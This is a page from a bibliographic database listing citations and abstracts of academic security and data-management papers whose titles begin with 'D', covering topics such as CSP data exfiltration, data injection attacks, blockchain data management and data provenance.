Visible to the public Biblio

Found 932 results

Filters: First Letter Of Title is D  [Clear All Filters]
A B C [D] E F G H I J K L M N O P Q R S T U V W X Y Z   [Show ALL]
D
Thuraisingham, B., Kantarcioglu, M., Hamlen, K., Khan, L., Finin, T., Joshi, A., Oates, T., Bertino, E..  2016.  A Data Driven Approach for the Science of Cyber Security: Challenges and Directions. 2016 IEEE 17th International Conference on Information Reuse and Integration (IRI). :1–10.

This paper describes a data driven approach to studying the science of cyber security (SoS). It argues that science is driven by data. It then describes issues and approaches towards the following three aspects: (i) Data Driven Science for Attack Detection and Mitigation, (ii) Foundations for Data Trustworthiness and Policy-based Sharing, and (iii) A Risk-based Approach to Security Metrics. We believe that the three aspects addressed in this paper will form the basis for studying the Science of Cyber Security.

Jeyakumar, Vimalkumar, Madani, Omid, ParandehGheibi, Ali, Yadav, Navindra.  2016.  Data Driven Data Center Network Security. Proceedings of the 2016 ACM on International Workshop on Security And Privacy Analytics. :48–48.

Large scale datacenters are becoming the compute and data platform of large enterprises, but their scale makes them difficult to secure applications running within. We motivate this setting using a real world complex scenario, and propose a data-driven approach to taming this complexity. We discuss several machine learning problems that arise, in particular focusing on inducing so-called whitelist communication policies, from observing masses of communications among networked computing nodes. Briefly, a whitelist policy specifies which machine, or groups of machines, can talk to which. We present some of the challenges and opportunities, such as noisy and incomplete data, non-stationarity, lack of supervision, challenges of evaluation, and describe some of the approaches we have found promising.

Oertel, Catharine, Gustafson, Joakim, Black, Alan W..  2016.  On Data Driven Parametric Backchannel Synthesis for Expressing Attentiveness in Conversational Agents. Proceedings of the Workshop on Multimodal Analyses Enabling Artificial Agents in Human-Machine Interaction. :43–47.

In this study, we are using a multi-party recording as a template for building a parametric speech synthesiser which is able to express different levels of attentiveness in backchannel tokens. This allowed us to investigate i) whether it is possible to express the same perceived level of attentiveness in synthesised than in natural backchannels; ii) whether it is possible to increase and decrease the perceived level of attentiveness of backchannels beyond the range observed in the original corpus.

Bessa, Ricardo J., Rua, David, Abreu, Cláudia, Machado, Paulo, Andrade, José R., Pinto, Rui, Gonçalves, Carla, Reis, Marisa.  2018.  Data Economy for Prosumers in a Smart Grid Ecosystem. Proceedings of the Ninth International Conference on Future Energy Systems. :622–630.

Smart grids technologies are enablers of new business models for domestic consumers with local flexibility (generation, loads, storage) and where access to data is a key requirement in the value stream. However, legislation on personal data privacy and protection imposes the need to develop local models for flexibility modeling and forecasting and exchange models instead of personal data. This paper describes the functional architecture of an home energy management system (HEMS) and its optimization functions. A set of data-driven models, embedded in the HEMS, are discussed for improving renewable energy forecasting skill and modeling multi-period flexibility of distributed energy resources.

Van Acker, Steven, Hausknecht, Daniel, Sabelfeld, Andrei.  2016.  Data Exfiltration in the Face of CSP. Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security. :853–864.

Cross-site scripting (XSS) attacks keep plaguing the Web. Supported by most modern browsers, Content Security Policy (CSP) prescribes the browser to restrict the features and communication capabilities of code on a web page, mitigating the effects of XSS.

This paper puts a spotlight on the problem of data exfiltration in the face of CSP. We bring attention to the unsettling discord in the security community about the very goals of CSP when it comes to preventing data leaks.

As consequences of this discord, we report on insecurities in the known protection mechanisms that are based on assumptions about CSP that turn out not to hold in practice.

To illustrate the practical impact of the discord, we perform a systematic case study of data exfiltration via DNS prefetching and resource prefetching in the face of CSP.

Our study of the popular browsers demonstrates that it is often possible to exfiltrate data by both resource prefetching and DNS prefetching in the face of CSP. Further, we perform a crawl of the top 10,000 Alexa domains to report on the cohabitance of CSP and prefetching in practice. Finally, we discuss directions to control data exfiltration and, for the case study, propose measures ranging from immediate fixes for the clients to prefetching-aware extensions of CSP.

Chatterjee, Tanusree, Ruj, Sushmita, DasBit, Sipra.  2018.  Data forwarding and update propagation in grid network for NDN: A low-overhead approach. 2018 IEEE International Conference on Advanced Networks and Telecommunications Systems (ANTS). :1–6.
Now-a-days Internet has become mostly content centric. Named Data Network (NDN) has emerged as a promising candidate to cope with the use of today's Internet. Several NDN features such as in-network caching, easier data forwarding, etc. in the routing method bring potential advantages over conventional networks. Despite the advantages, there are many challenges in NDN which are yet to be addressed. In this paper, we address two of such challenges in NDN routing: (1) Huge storage overhead in NDN router (2) High communication over-heads in the network during propagation of routing information updates. We propose changes in existing NDN routing with the aim to provide a low-overhead solution to these problems. Here instead of storing the Link State Data Base (LSDB) in all the routers, it is kept in selected special nodes only. The use of special nodes lowers down the overall storage and update overheads. We also provide supporting algorithms for data forwarding and update for grid network. The performance of the proposed method is evaluated in terms of storage and communication overheads. The results show the overheads are reduced by almost one third as compared to the existing routing method in NDN.
Khobragade, P.K., Malik, L.G..  2014.  Data Generation and Analysis for Digital Forensic Application Using Data Mining. Communication Systems and Network Technologies (CSNT), 2014 Fourth International Conference on. :458-462.

In the cyber crime huge log data, transactional data occurs which tends to plenty of data for storage and analyze them. It is difficult for forensic investigators to play plenty of time to find out clue and analyze those data. In network forensic analysis involves network traces and detection of attacks. The trace involves an Intrusion Detection System and firewall logs, logs generated by network services and applications, packet captures by sniffers. In network lots of data is generated in every event of action, so it is difficult for forensic investigators to find out clue and analyzing those data. In network forensics is deals with analysis, monitoring, capturing, recording, and analysis of network traffic for detecting intrusions and investigating them. This paper focuses on data collection from the cyber system and web browser. The FTK 4.0 is discussing for memory forensic analysis and remote system forensic which is to be used as evidence for aiding investigation.
 

Luo, Chu, Fylakis, Angelos, Partala, Juha, Klakegg, Simon, Goncalves, Jorge, Liang, Kaitai, Seppänen, Tapio, Kostakos, Vassilis.  2016.  A Data Hiding Approach for Sensitive Smartphone Data. Proceedings of the 2016 ACM International Joint Conference on Pervasive and Ubiquitous Computing. :557–568.

We develop and evaluate a data hiding method that enables smartphones to encrypt and embed sensitive information into carrier streams of sensor data. Our evaluation considers multiple handsets and a variety of data types, and we demonstrate that our method has a computational cost that allows real-time data hiding on smartphones with negligible distortion of the carrier stream. These characteristics make it suitable for smartphone applications involving privacy-sensitive data such as medical monitoring systems and digital forensics tools.

Luo, Chu, Fylakis, Angelos, Partala, Juha, Klakegg, Simon, Goncalves, Jorge, Liang, Kaitai, Seppänen, Tapio, Kostakos, Vassilis.  2016.  A Data Hiding Approach for Sensitive Smartphone Data. Proceedings of the 2016 ACM International Joint Conference on Pervasive and Ubiquitous Computing. :557–568.

We develop and evaluate a data hiding method that enables smartphones to encrypt and embed sensitive information into carrier streams of sensor data. Our evaluation considers multiple handsets and a variety of data types, and we demonstrate that our method has a computational cost that allows real-time data hiding on smartphones with negligible distortion of the carrier stream. These characteristics make it suitable for smartphone applications involving privacy-sensitive data such as medical monitoring systems and digital forensics tools.

Kaji, Shugo, Kinugawa, Masahiro, Fujimoto, Daisuke, Hayashi, Yu-ichi.  2019.  Data Injection Attack Against Electronic Devices With Locally Weakened Immunity Using a Hardware Trojan. IEEE Transactions on Electromagnetic Compatibility. 61:1115—1121.
Intentional electromagnetic interference (IEMI) of information and communication devices is based on high-power electromagnetic environments far exceeding the device immunity to electromagnetic interference. IEMI dramatically alters the electromagnetic environment throughout the device by interfering with the electromagnetic waves inside the device and destroying low-tolerance integrated circuits (ICs) and other elements, thereby reducing the availability of the device. In contrast, in this study, by using a hardware Trojan (HT) that is quickly mountable by physically accessing the devices, to locally weaken the immunity of devices, and then irradiating electromagnetic waves of a specific frequency, only the attack targets are intentionally altered electromagnetically. Therefore, we propose a method that uses these electromagnetic changes to rewrite or generate data and commands handled within devices. Specifically, targeting serial communication systems used inside and outside the devices, the installation of an HT on the communication channel weakens local immunity. This shows that it is possible to generate an electrical signal representing arbitrary data on the communication channel by applying electromagnetic waves of sufficiently small output compared with the conventional IEMI and letting the IC process the data. In addition, we explore methods for countering such attacks.
Tajer, A..  2017.  Data Injection Attacks in Electricity Markets: Stochastic Robustness. 2017 IEEE Global Conference on Signal and Information Processing (GlobalSIP). :1095–1099.

Deregulated electricity markets rely on a two-settlement system consisting of day-ahead and real-time markets, across which electricity price is volatile. In such markets, locational marginal pricing is widely adopted to set electricity prices and manage transmission congestion. Locational marginal prices are vulnerable to measurement errors. Existing studies show that if the adversaries are omniscient, they can design profitable attack strategies without being detected by the residue-based bad data detectors. This paper focuses on a more realistic setting, in which the attackers have only partial and imperfect information due to their limited resources and restricted physical access to the grid. Specifically, the attackers are assumed to have uncertainties about the state of the grid, and the uncertainties are modeled stochastically. Based on this model, this paper offers a framework for characterizing the optimal stochastic guarantees for the effectiveness of the attacks and the associated pricing impacts.

S. Petcy Carolin, M. Somasundaram.  2016.  Data loss protection and data security using agents for cloud environment - IEEE Conference Publication.

Cyber infrastructures are highly vulnerable to intrusions and other threats. The main challenges in cloud computing are failure of data centres and recovery of lost data and providing a data security system. This paper has proposed a Virtualization and Data Recovery to create a virtual environment and recover the lost data from data servers and agents for providing data security in a cloud environment. A Cloud Manager is used to manage the virtualization and to handle the fault. Erasure code algorithm is used to recover the data which initially separates the data into n parts and then encrypts and stores in data servers. The semi trusted third party and the malware changes made in data stored in data centres can be identified by Artificial Intelligent methods using agents. Java Agent Development Framework (JADE) is a tool to develop agents and facilitates the communication between agents and allows the computing services in the system. The framework designed and implemented in the programming language JAVA as gateway or firewall to recover the data loss.
 

Jung, M. Y., Jang, J. W..  2017.  Data management and searching system and method to provide increased security for IoT platform. 2017 International Conference on Information and Communication Technology Convergence (ICTC). :873–878.

Existing data management and searching system for Internet of Things uses centralized database. For this reason, security vulnerabilities are found in this system which consists of server such as IP spoofing, single point of failure and Sybil attack. This paper proposes data management system is based on blockchain which ensures security by using ECDSA digital signature and SHA-256 hash function. Location that is indicated as IP address of data owner and data name are transcribed in block which is included in the blockchain. Furthermore, we devise data manegement and searching method through analyzing block hash value. By using security properties of blockchain such as authentication, non-repudiation and data integrity, this system has advantage of security comparing to previous data management and searching system using centralized database or P2P networks.

Wu, Hanqing, Cao, Jiannong, Yang, Yanni, Tung, Cheung Leong, Jiang, Shan, Tang, Bin, Liu, Yang, Wang, Xiaoqing, Deng, Yuming.  2019.  Data Management in Supply Chain Using Blockchain: Challenges and a Case Study. 2019 28th International Conference on Computer Communication and Networks (ICCCN). :1–8.

Supply chain management (SCM) is fundamental for gaining financial, environmental and social benefits in the supply chain industry. However, traditional SCM mechanisms usually suffer from a wide scope of issues such as lack of information sharing, long delays for data retrieval, and unreliability in product tracing. Recent advances in blockchain technology show great potential to tackle these issues due to its salient features including immutability, transparency, and decentralization. Although there are some proof-of-concept studies and surveys on blockchain-based SCM from the perspective of logistics, the underlying technical challenges are not clearly identified. In this paper, we provide a comprehensive analysis of potential opportunities, new requirements, and principles of designing blockchain-based SCM systems. We summarize and discuss four crucial technical challenges in terms of scalability, throughput, access control, data retrieval and review the promising solutions. Finally, a case study of designing blockchain-based food traceability system is reported to provide more insights on how to tackle these technical challenges in practice.

Chertchom, Prajak, Tanimoto, Shigeaki, Konosu, Tsutomu, Iwashita, Motoi, Kobayashi, Toru, Sato, Hiroyuki, Kanai, Atsushi.  2019.  Data Management Portfolio for Improvement of Privacy in Fog-to-cloud Computing Systems. 2019 8th International Congress on Advanced Applied Informatics (IIAI-AAI). :884–889.
With the challenge of the vast amount of data generated by devices at the edge of networks, new architecture needs a well-established data service model that accounts for privacy concerns. This paper presents an architecture of data transmission and a data portfolio with privacy for fog-to-cloud (DPPforF2C). We would like to propose a practical data model with privacy from a digitalized information perspective at fog nodes. In addition, we also propose an architecture for implicating the privacy of DPPforF2C used in fog computing. Technically, we design a data portfolio based on the Message Queuing Telemetry Transport (MQTT) and the Advanced Message Queuing Protocol (AMQP). We aim to propose sample data models with privacy architecture because there are some differences in the data obtained from IoT devices and sensors. Thus, we propose an architecture with the privacy of DPPforF2C for publishing data from edge devices to fog and to cloud servers that could be applied to fog architecture in the future.
Kim, Bo Youn, Choi, Seong Seok, Jang, Ju Wook.  2018.  Data Managing and Service Exchanging on IoT Service Platform Based on Blockchain with Smart Contract and Spatial Data Processing. Proceedings of the 2018 International Conference on Information Science and System. :59–63.

Expectation of cryptocurrencies has been increased rapidly and all of these cryptocurrencies are generated on blockchain platform. This means not only the paradigm is changing in the field of finance but also the blockchain platform is technically stable. Based on the stability of blockchain, many kind of crypto currencies or application platforms are being implemented or released and world famous banks are applying blockchain on their financial service[1]. Even law for exchanging cryptocurrencies is being discussed. Furthermore, blockchain platforms also run programmed source code which is called as smart contract on its distributed platform. Smart contract extends usage of blockchain platform. So in this paper, we propose an algorithm for recording and managing location data of IoT service provider and user based on blockchain with smart contract. Our proposal records data of participants in network by blockchain which ensures security and match with other optimized participant by spatial data processing.

Haoliang Lou, Yunlong Ma, Feng Zhang, Min Liu, Weiming Shen.  2014.  Data mining for privacy preserving association rules based on improved MASK algorithm. Computer Supported Cooperative Work in Design (CSCWD), Proceedings of the 2014 IEEE 18th International Conference on. :265-270.

With the arrival of the big data era, information privacy and security issues become even more crucial. The Mining Associations with Secrecy Konstraints (MASK) algorithm and its improved versions were proposed as data mining approaches for privacy preserving association rules. The MASK algorithm only adopts a data perturbation strategy, which leads to a low privacy-preserving degree. Moreover, it is difficult to apply the MASK algorithm into practices because of its long execution time. This paper proposes a new algorithm based on data perturbation and query restriction (DPQR) to improve the privacy-preserving degree by multi-parameters perturbation. In order to improve the time-efficiency, the calculation to obtain an inverse matrix is simplified by dividing the matrix into blocks; meanwhile, a further optimization is provided to reduce the number of scanning database by set theory. Both theoretical analyses and experiment results prove that the proposed DPQR algorithm has better performance.
 

Haoliang Lou, Yunlong Ma, Feng Zhang, Min Liu, Weiming Shen.  2014.  Data mining for privacy preserving association rules based on improved MASK algorithm. Computer Supported Cooperative Work in Design (CSCWD), Proceedings of the 2014 IEEE 18th International Conference on. :265-270.

With the arrival of the big data era, information privacy and security issues become even more crucial. The Mining Associations with Secrecy Konstraints (MASK) algorithm and its improved versions were proposed as data mining approaches for privacy preserving association rules. The MASK algorithm only adopts a data perturbation strategy, which leads to a low privacy-preserving degree. Moreover, it is difficult to apply the MASK algorithm into practices because of its long execution time. This paper proposes a new algorithm based on data perturbation and query restriction (DPQR) to improve the privacy-preserving degree by multi-parameters perturbation. In order to improve the time-efficiency, the calculation to obtain an inverse matrix is simplified by dividing the matrix into blocks; meanwhile, a further optimization is provided to reduce the number of scanning database by set theory. Both theoretical analyses and experiment results prove that the proposed DPQR algorithm has better performance.
 

Benjamin, B., Coffman, J., Esiely-Barrera, H., Farr, K., Fichter, D., Genin, D., Glendenning, L., Hamilton, P., Harshavardhana, S., Hom, R. et al..  2017.  Data Protection in OpenStack. 2017 IEEE 10th International Conference on Cloud Computing (CLOUD). :560–567.

As cloud computing becomes increasingly pervasive, it is critical for cloud providers to support basic security controls. Although major cloud providers tout such features, relatively little is known in many cases about their design and implementation. In this paper, we describe several security features in OpenStack, a widely-used, open source cloud computing platform. Our contributions to OpenStack range from key management and storage encryption to guaranteeing the integrity of virtual machine (VM) images prior to boot. We describe the design and implementation of these features in detail and provide a security analysis that enumerates the threats that each mitigates. Our performance evaluation shows that these security features have an acceptable cost-in some cases, within the measurement error observed in an operational cloud deployment. Finally, we highlight lessons learned from our real-world development experiences from contributing these features to OpenStack as a way to encourage others to transition their research into practice.

Dang, T. D., Hoang, D..  2017.  A data protection model for fog computing. 2017 Second International Conference on Fog and Mobile Edge Computing (FMEC). :32–38.

Cloud computing has established itself as an alternative IT infrastructure and service model. However, as with all logically centralized resource and service provisioning infrastructures, cloud does not handle well local issues involving a large number of networked elements (IoTs) and it is not responsive enough for many applications that require immediate attention of a local controller. Fog computing preserves many benefits of cloud computing and it is also in a good position to address these local and performance issues because its resources and specific services are virtualized and located at the edge of the customer premise. However, data security is a critical challenge in fog computing especially when fog nodes and their data move frequently in its environment. This paper addresses the data protection and the performance issues by 1) proposing a Region-Based Trust-Aware (RBTA) model for trust translation among fog nodes of regions, 2) introducing a Fog-based Privacy-aware Role Based Access Control (FPRBAC) for access control at fog nodes, and 3) developing a mobility management service to handle changes of users and fog devices' locations. The implementation results demonstrate the feasibility and the efficiency of our proposed framework.

Patil, A., Jha, A., Mulla, M. M., Narayan, D. G., Kengond, S..  2020.  Data Provenance Assurance for Cloud Storage Using Blockchain. 2020 International Conference on Advances in Computing, Communication Materials (ICACCM). :443—448.

Cloud forensics investigates the crime committed over cloud infrastructures like SLA-violations and storage privacy. Cloud storage forensics is the process of recording the history of the creation and operations performed on a cloud data object and investing it. Secure data provenance in the Cloud is crucial for data accountability, forensics, and privacy. Towards this, we present a Cloud-based data provenance framework using Blockchain, which traces data record operations and generates provenance data. Initially, we design a dropbox like application using AWS S3 storage. The application creates a cloud storage application for the students and faculty of the university, thereby making the storage and sharing of work and resources efficient. Later, we design a data provenance mechanism for confidential files of users using Ethereum blockchain. We also evaluate the proposed system using performance parameters like query and transaction latency by varying the load and number of nodes of the blockchain network.

Kim, Sejin, Oh, Jisun, Kim, Yoonhee.  2019.  Data Provenance for Experiment Management of Scientific Applications on GPU. 2019 20th Asia-Pacific Network Operations and Management Symposium (APNOMS). :1–4.
Graphics Processing Units (GPUs) are getting popularly utilized for multi-purpose applications in order to enhance highly performed parallelism of computation. As memory virtualization methods in GPU nodes are not efficiently provided to deal with diverse memory usage patterns for these applications, the success of their execution depends on exclusive and limited use of physical memory in GPU environments. Therefore, it is important to predict a pattern change of GPU memory usage during runtime execution of an application. Data provenance extracted from application characteristics, GPU runtime environments, input, and execution patterns from runtime monitoring, is defined for supporting application management to set runtime configuration and predict an experimental result, and utilize resource with co-located applications. In this paper, we define data provenance of an application on GPUs and manage data by profiling the execution of CUDA scientific applications. Data provenance management helps to predict execution patterns of other similar experiments and plan efficient resource configuration.
Davis, D. B., Featherston, J., Fukuda, M., Asuncion, H. U..  2017.  Data Provenance for Multi-Agent Models. 2017 IEEE 13th International Conference on e-Science (e-Science). :39–48.

Multi-agent simulations are useful for exploring collective patterns of individual behavior in social, biological, economic, network, and physical systems. However, there is no provenance support for multi-agent models (MAMs) in a distributed setting. To this end, we introduce ProvMASS, a novel approach to capture provenance of MAMs in a distributed memory by combining inter-process identification, lightweight coordination of in-memory provenance storage, and adaptive provenance capture. ProvMASS is built on top of the Multi-Agent Spatial Simulation (MASS) library, a framework that combines multi-agent systems with large-scale fine-grained agent-based models, or MAMs. Unlike other environments supporting MAMs, MASS parallelizes simulations with distributed memory, where agents and spatial data are shared application resources. We evaluate our approach with provenance queries to support three use cases and performance measures. Initial results indicate that our approach can support various provenance queries for MAMs at reasonable performance overhead.

Yazici, I. M., Karabulut, E., Aktas, M. S..  2018.  A Data Provenance Visualization Approach. 2018 14th International Conference on Semantics, Knowledge and Grids (SKG). :84–91.
Data Provenance has created an emerging requirement for technologies that enable end users to access, evaluate, and act on the provenance of data in recent years. In the era of Big Data, the amount of data created by corporations around the world has grown each year. As an example, both in the Social Media and e-Science domains, data is growing at an unprecedented rate. As the data has grown rapidly, information on the origin and lifecycle of the data has also grown. In turn, this requires technologies that enable the clarification and interpretation of data through the use of data provenance. This study proposes methodologies towards the visualization of W3C-PROV-O Specification compatible provenance data. The visualizations are done by summarization and comparison of the data provenance. We facilitated the testing of these methodologies by providing a prototype, extending an existing open source visualization tool. We discuss the usability of the proposed methodologies with an experimental study; our initial results show that the proposed approach is usable, and its processing overhead is negligible.
Sillaber, Christian, Sauerwein, Clemens, Mussmann, Andrea, Breu, Ruth.  2016.  Data Quality Challenges and Future Research Directions in Threat Intelligence Sharing Practice. Proceedings of the 2016 ACM on Workshop on Information Sharing and Collaborative Security. :65–70.

In the last couple of years, organizations have demonstrated an increased willingness to participate in threat intelligence sharing platforms. The open exchange of information and knowledge regarding threats, vulnerabilities, incidents and mitigation strategies results from the organizations' growing need to protect against today's sophisticated cyber attacks. To investigate data quality challenges that might arise in threat intelligence sharing, we conducted focus group discussions with ten expert stakeholders from security operations centers of various globally operating organizations. The study addresses several factors affecting shared threat intelligence data quality at multiple levels, including collecting, processing, sharing and storing data. As expected, the study finds that the main factors that affect shared threat intelligence data stem from the limitations and complexities associated with integrating and consolidating shared threat intelligence from different sources while ensuring the data's usefulness for an inhomogeneous group of participants.Data quality is extremely important for shared threat intelligence. As our study has shown, there are no fundamentally new data quality issues in threat intelligence sharing. However, as threat intelligence sharing is an emerging domain and a large number of threat intelligence sharing tools are currently being rushed to market, several data quality issues – particularly related to scalability and data source integration – deserve particular attention.